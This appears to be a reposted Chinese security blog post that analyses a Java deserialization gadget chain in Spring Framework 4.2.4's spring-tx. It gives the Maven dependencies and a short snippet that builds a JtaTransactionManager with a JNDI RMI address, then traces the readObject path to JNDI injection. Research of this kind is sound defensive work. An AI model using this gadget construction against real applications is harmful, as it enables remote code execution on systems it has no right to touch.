[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)

Posted Y4tacker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)相关的知识,希望对你有一定的参考价值。

文章目录

环境

来自spring-jndi

依赖

<dependencies>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-tx</artifactId>
      <version>4.2.4.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-context</artifactId>
      <version>4.2.4.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>javax.transaction</groupId>
      <artifactId>javax.transaction-api</artifactId>
      <version>1.2</version>
    </dependency>
  </dependencies>

分析

利用链构造

String jndiAddress = "rmi://127.0.0.1:1099/Object";
org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();
object.setUserTransactionName(jndiAddress);

利用链分析

整个利用链是比较简单的,入口点在JtaTransactionManagerreadObject方法,

不为Null长度也大于0

这个lookup()函数符合JNDI注入的特征

继续跟入


InitialContext

最后回调实现了JNDI注入

以上是关于[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)的主要内容,如果未能解决你的问题,请参考以下文章

Java安全之反序列化回显与内存马

Java JSON 反序列化之殇(看雪2017安全开发者峰会演讲回顾11)

[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)

[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)

[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)

网络安全之反序列化漏洞分析